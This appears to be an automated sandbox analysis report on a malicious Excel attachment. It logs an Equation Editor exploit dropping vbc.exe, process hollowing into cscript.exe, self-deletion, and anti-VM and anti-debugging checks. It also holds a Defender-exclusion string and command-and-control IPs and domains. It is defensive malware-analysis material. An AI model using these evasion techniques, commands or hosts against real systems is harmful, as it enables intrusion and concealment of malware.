Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FF9F0 NtClose,LdrInitializeThunk, 7_2_025FF9F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_025FFED0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFFB4 NtCreateSection,LdrInitializeThunk, 7_2_025FFFB4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_025FFC60
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_025FFDC0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFD8C NtDelayExecution,LdrInitializeThunk, 7_2_025FFD8C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02600060 NtQuerySection, 7_2_02600060
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02600078 NtResumeThread, 7_2_02600078
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02600048 NtProtectVirtualMemory, 7_2_02600048
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026010D0 NtOpenProcessToken, 7_2_026010D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02601148 NtOpenThread, 7_2_02601148
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260010C NtOpenDirectoryObject, 7_2_0260010C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026001D4 NtSetValueKey, 7_2_026001D4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFA50 NtEnumerateValueKey, 7_2_025FFA50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFA20 NtQueryInformationFile, 7_2_025FFA20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFBE8 NtQueryVirtualMemory, 7_2_025FFBE8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FF8CC NtWaitForSingleObject, 7_2_025FF8CC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02601930 NtSetContextThread, 7_2_02601930
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FF938 NtWriteFile, 7_2_025FF938
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFE24 NtWriteVirtualMemory, 7_2_025FFE24
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFEA0 NtReadVirtualMemory, 7_2_025FFEA0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFF34 NtQueueApcThread, 7_2_025FFF34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFFFC NtCreateProcessEx, 7_2_025FFFFC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC48 NtSetInformationFile, 7_2_025FFC48
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02600C40 NtGetContextThread, 7_2_02600C40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC30 NtOpenProcess, 7_2_025FFC30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC90 NtUnmapViewOfSection, 7_2_025FFC90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFD5C NtEnumerateKey, 7_2_025FFD5C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02601D80 NtSuspendThread, 7_2_02601D80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_000885F0 NtCreateFile, 7_2_000885F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_000886A0 NtReadFile, 7_2_000886A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_00088720 NtClose, 7_2_00088720
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_000887D0 NtAllocateVirtualMemory, 7_2_000887D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_000885EE NtCreateFile, 7_2_000885EE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008871C NtClose, 7_2_0008871C
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Vecchio debito_SKTGH_465585484754.xlsx Virustotal: Detection: 39%
Source: Vecchio debito_SKTGH_465585484754.xlsx ReversingLabs: Detection: 32%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Vecchio debito_SKTGH_465585484754.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD8A2.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/20@4/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: .VBPud<_
Source: vbc[1].exe.2.dr, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: vbc[1].exe.2.dr, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: vbc.exe.2.dr, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: vbc.exe.2.dr, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.ff0000.1.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.ff0000.1.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.ff0000.0.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.ff0000.0.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.ff0000.4.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.ff0000.4.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.ff0000.5.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.ff0000.5.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.477475563.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.514399498.0000000000910000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.478435499.0000000000600000.00000004.00000800.00020000.00000000.sdmp, cscript.exe
Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CharUnicodeIn.pdb source: vbc.exe
Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: vbc[1].exe.2.dr, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.ff0000.1.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.ff0000.0.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.4.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.vbc.exe.ff0000.5.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.6.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.2.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.10.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.3.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.1.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.0.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.8.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: vbc[1].exe.2.dr, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: vbc.exe.2.dr, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.2.vbc.exe.ff0000.1.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.vbc.exe.ff0000.0.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.4.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.2.vbc.exe.ff0000.5.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.6.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.2.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.10.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.3.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.1.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.0.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.8.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8C9 push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8C9 push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A14C push edx; iretd 5_2_0041A14D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A9F5 push ss; retf 5_2_0041A9F6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C985 push 2E33947Ah; ret 5_2_0041CBEC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041526B push es; retf 5_2_00415281
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040C30E pushad ; iretd 5_2_0040C30F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CBED push 2E33947Ah; ret 5_2_0041CBEC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D466 push 80958155h; iretd 5_2_0041D477
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415C32 push ecx; ret 5_2_00415C33
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260DFA1 push ecx; ret 7_2_0260DFB4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008A14C push edx; iretd 7_2_0008A14D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008526B push es; retf 7_2_00085281
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0007C30E pushad ; iretd 7_2_0007C30F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008D466 push 80958155h; iretd 7_2_0008D477
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B7E5 push eax; ret 7_2_0008B838
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B83B push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B832 push eax; ret 7_2_0008B838
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B89C push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B8C9 push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B8C9 push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C985 push 2E33947Ah; ret 7_2_0008CBEC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008A9F5 push ss; retf 7_2_0008A9F6

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 4.2.vbc.exe.2564dd8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2505e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1416, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000078614 second address: 000000000007861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 00000000000789AE second address: 00000000000789B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1424 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1812 Thread sleep time: -33348s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2636 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2844 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 33348 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.485876483.000000000457A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.494078232.000000000456F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.493996125.00000000044E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.497464057.000000000029B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging
barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026126F8 mov eax, dword ptr fs:[00000030h] 7_2_026126F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 162.241.244.46 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 206.188.192.2 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 216.177.167.5 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.laqueenbeautybar.supplies
Source: C:\Windows\explorer.exe Domain query: www.dairatwsl.com
Source: C:\Windows\explorer.exe Domain query: www.vacoveco.com
Source: C:\Windows\explorer.exe Domain query: www.hevenorfeed.com
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: ED0000 Jump to behavior
Maps a DLL or memory area into another process
